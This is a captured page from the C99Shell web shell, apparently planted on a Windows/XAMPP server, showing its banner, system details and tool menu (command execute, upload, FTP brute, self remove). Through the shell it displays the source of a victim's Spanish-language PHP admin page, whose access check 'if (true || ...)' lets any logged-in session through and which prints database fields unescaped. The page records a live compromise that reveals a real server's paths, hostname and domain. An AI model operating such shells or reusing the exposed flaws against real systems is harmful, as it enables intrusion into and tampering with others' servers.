!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

C:\Intranet\C\xampp\htdocs\php\OAB\admin\   drwxrwxrwx
Free 4.09 GB of 39.52 GB (10.35%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     62.php (8.83 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php require_once('../Connections/oa.php'); ?>
<?php
// *** Logout the current user.
$FF_Logout $HTTP_SERVER_VARS['PHP_SELF'] . "?FF_Logoutnow=1";
if (isset(
$HTTP_GET_VARS['FF_Logoutnow']) && $HTTP_GET_VARS['FF_Logoutnow']=="1") {
  if (!
session_id()) session_start();
  
session_unregister("MM_Username");
  
session_unregister("MM_UserAuthorization");
  
$FF_logoutRedirectPage "../index.php";
  
// redirect with URL parameters (remove the "FF_Logoutnow" query param).
  
if ($FF_logoutRedirectPage == ""$FF_logoutRedirectPage $HTTP_SERVER_VARS['PHP_SELF'];
  if (!
strpos($FF_logoutRedirectPage"?") && $HTTP_SERVER_VARS['QUERY_STRING'] != "") {
    
$FF_newQS "?";
    
reset ($HTTP_GET_VARS);
    while (list (
$key$val) = each ($HTTP_GET_VARS)) {
      if(
$key != "FF_Logoutnow"){
        if (
strlen($FF_newQS) > 1$FF_newQS .= "&";
        
$FF_newQS .= $key "=" urlencode($val);
      }
    }
    if (
strlen($FF_newQS) > 1$FF_logoutRedirectPage .= $FF_newQS;
  }
  
header("Location: $FF_logoutRedirectPage");
  exit;
}

// *** Restrict Access To Page: Grant or deny access to this page
$FF_authorizedUsers=" ";
$FF_authFailedURL="login.php";
$FF_grantAccess=0;
if (!
session_id()) session_start();
if (isset(
$HTTP_SESSION_VARS['priorUrl'])) session_unregister("priorUrl");
if (isset(
$HTTP_SESSION_VARS["MM_Username"])) {
  if (
true || !(isset($HTTP_SESSION_VARS["MM_UserAuthorization"])) || $HTTP_SESSION_VARS["MM_UserAuthorization"]=="" || strpos($FF_authorizedUsers$HTTP_SESSION_VARS["MM_UserAuthorization"])) {
    
$FF_grantAccess 1;
  }
}
if (!
$FF_grantAccess) {
  
$priorUrl "http://".$HTTP_SERVER_VARS['HTTP_HOST'].$HTTP_SERVER_VARS['SCRIPT_NAME'];
  if (isset(
$HTTP_SERVER_VARS['QUERY_STRING']) && $HTTP_SERVER_VARS['QUERY_STRING'] != ""$priorUrl .= "?".$HTTP_SERVER_VARS['QUERY_STRING'];
  
session_register("priorUrl");
  
$FF_qsChar "?";
  if (
strpos($FF_authFailedURL"?")) $FF_qsChar "&";
  
$FF_referrer "Restricted Area";
  
$FF_authFailedURL $FF_authFailedURL $FF_qsChar "accessdenied=" urlencode($FF_referrer);
  
header("Location: $FF_authFailedURL");
  exit;
}

if (!
function_exists("GetSQLValueString")) {
function 
GetSQLValueString($theValue$theType$theDefinedValue ""$theNotDefinedValue ""
{
  
$theValue get_magic_quotes_gpc() ? stripslashes($theValue) : $theValue;

  
$theValue function_exists("mysql_real_escape_string") ? mysql_real_escape_string($theValue) : mysql_escape_string($theValue);

  switch (
$theType) {
    case 
"text":
      
$theValue = ($theValue != "") ? "'" $theValue "'" "NULL";
      break;    
    case 
"long":
    case 
"int":
      
$theValue = ($theValue != "") ? intval($theValue) : "NULL";
      break;
    case 
"double":
      
$theValue = ($theValue != "") ? "'" doubleval($theValue) . "'" "NULL";
      break;
    case 
"date":
      
$theValue = ($theValue != "") ? "'" $theValue "'" "NULL";
      break;
    case 
"defined":
      
$theValue = ($theValue != "") ? $theDefinedValue $theNotDefinedValue;
      break;
  }
  return 
$theValue;
}
}

$editFormAction $HTTP_SERVER_VARS['PHP_SELF'];
if (isset(
$HTTP_SERVER_VARS['QUERY_STRING'])) {
  
$editFormAction .= "?" $HTTP_SERVER_VARS['QUERY_STRING'];
}

if ((isset(
$_POST["MM_update"])) && ($_POST["MM_update"] == "form1")) {
  
$updateSQL sprintf("UPDATE contenidos SET idcat=%s, orden=%s, tema=%s, titulo=%s, textoinicial=%s, textocompleto=%s, enlace=%s, imagen=%s WHERE idcontenido=%s",
                       
GetSQLValueString($HTTP_POST_VARS['idcat'], "int"),
                       
GetSQLValueString($HTTP_POST_VARS['orden'], "int"),
                       
GetSQLValueString($HTTP_POST_VARS['tema'], "int"),
                       
GetSQLValueString($HTTP_POST_VARS['titulo'], "text"),
                       
GetSQLValueString($HTTP_POST_VARS['textoinicial'], "text"),
                       
GetSQLValueString($HTTP_POST_VARS['textocompleto'], "text"),
                       
GetSQLValueString($HTTP_POST_VARS['enlace'], "text"),
                       
GetSQLValueString($HTTP_POST_VARS['imagen'], "text"),
                       
GetSQLValueString($HTTP_POST_VARS['idcontenido'], "int"));

  
mysql_select_db($database_oa$oa);
  
$Result1 mysql_query($updateSQL$oa) or die(mysql_error());

  
$updateGoTo "62.php";
  if (isset(
$_SERVER['QUERY_STRING'])) {
    
$updateGoTo .= (strpos($updateGoTo'?')) ? "&" "?";
    
$updateGoTo .= $_SERVER['QUERY_STRING'];
  }
  
header(sprintf("Location: %s"$updateGoTo));
}

mysql_select_db($database_oa$oa);
$query_rsCont "SELECT * FROM contenidos WHERE idcontenido=62 ORDER BY titulo";
$rsCont mysql_query($query_rsCont$oa) or die(mysql_error());
$row_rsCont mysql_fetch_assoc($rsCont);
$totalRows_rsCont mysql_num_rows($rsCont);
?>
<html>
<head>
<title>ACTUALIZAR AUTORREGULACION</title>
<!-- tinyMCE -->
<script language="javascript" type="text/javascript" src="/tinymce/jscripts/tiny_mce/tiny_mce.js"></script>
<script language="javascript" type="text/javascript">
tinyMCE.init({
    theme : "advanced",
    language : "es",
    theme_advanced_resizing : true,
    theme_advanced_disable : "cleanup,code,help,styleselect,cut,copy,paste",
    mode : "textareas",
    plugins : "table,advhr,advimage,emotions,iespell,insertdatetime,preview,flash,searchreplace,print,contextmenu,iwimg",
    theme_advanced_buttons1_add_before : "save,separator",
    theme_advanced_buttons1_add : "fontselect,fontsizeselect, iwimg",
    theme_advanced_buttons2_add : "separator,insertdate,inserttime,preview,zoom,separator,forecolor,backcolor",
    theme_advanced_buttons3_add : "emotions,iespell,flash,advhr,separator,print",
    theme_advanced_buttons2_add_before: "cut,copy,paste,separator,search,replace,separator",
    theme_advanced_buttons3_add_before : "tablecontrols,separator",
    theme_advanced_toolbar_location : "top",
    theme_advanced_toolbar_align : "center",
    theme_advanced_path_location : "bottom",
    plugin_insertdate_dateFormat : "%Y-%m-%d",
    plugin_insertdate_timeFormat : "%H:%M:%S",
    extended_valid_elements : "a[name|href|target|title|onclick],img[class|src|border=0|alt|title|hspace|vspace|width|height|align|onmouseover|onmouseout|name],hr[class|width|size|noshade],font[face|size|color|style],span[class|align|style]",
    external_link_list_url : "tinymce/example/example_link_list.js",
    external_image_list_url : "tinymce/example/example_image_list.js",
    flash_external_list_url : "tinymce/example/example_flash_list.js",
relative_urls : false,
remove_script_host : true,
document_base_url : "http://observatorio.dama.gov.co/",
    theme_advanced_buttons3_add : "pastetext,pasteword,selectall"
});
function convertWord(type, content) {
    switch (type) {
        // Gets executed before the built in logic performes it's cleanups
        case "before":
            content = content.toLowerCase(); // Some dummy logic
            break;

        // Gets executed after the built in logic performes it's cleanups
        case "after":
            content = content.toLowerCase(); // Some dummy logic
            break;
    }

    return content;
}

</script>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>

<body>
<table width="400" border="0" align="center" cellpadding="0" cellspacing="0">
  <tr>
    <td><a href="<?php echo $FF_Logout ?>">Salir</a></td>
  </tr>
</table>
<table width="600" border="1" align="center" cellpadding="0" cellspacing="0">
  <tr>
    <td>&nbsp;</td>
  </tr>
  <tr>
    <td><form name="form1" method="POST" action="<?php echo $editFormAction?>">
        <p> 
          <input name="idcontenido" type="hidden" id="idcontenido" value="<?php echo $row_rsCont['idcontenido']; ?>">
          <input name="idcat" type="hidden" id="idcat" value="<?php echo $row_rsCont['idcat']; ?>">
          <input name="orden" type="hidden" id="orden" value="<?php echo $row_rsCont['orden']; ?>">
          <input name="enlace" type="hidden" id="enlace" value="<?php echo $row_rsCont['enlace']; ?>">
          <input name="imagen" type="hidden" id="imagen" value="<?php echo $row_rsCont['imagen']; ?>">
        </p>
        <p> 
          <input name="tema" type="text" id="tema" value="<?php echo $row_rsCont['tema']; ?>">
        </p>
        <p> 
          <textarea name="titulo" cols="100" rows="8" id="titulo"><?php echo $row_rsCont['titulo']; ?></textarea>
        </p>
        <p> 
          <textarea name="textoinicial" cols="100" rows="15" id="textoinicial"><?php echo $row_rsCont['textoinicial']; ?></textarea>
        </p>
        <p> 
          <textarea name="textocompleto" cols="100" rows="15" id="textocompleto"><?php echo $row_rsCont['textocompleto']; ?></textarea>
          <br>
          <input type="submit" name="Submit" value="Enviar">
        </p>
        <input type="hidden" name="MM_update" value="form1">
      </form></td>
  </tr>
  <tr>
    <td>&nbsp;</td>
  </tr>
</table>
</body>
</html>
<?php
mysql_free_result
($rsCont);
?>


:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0156 ]--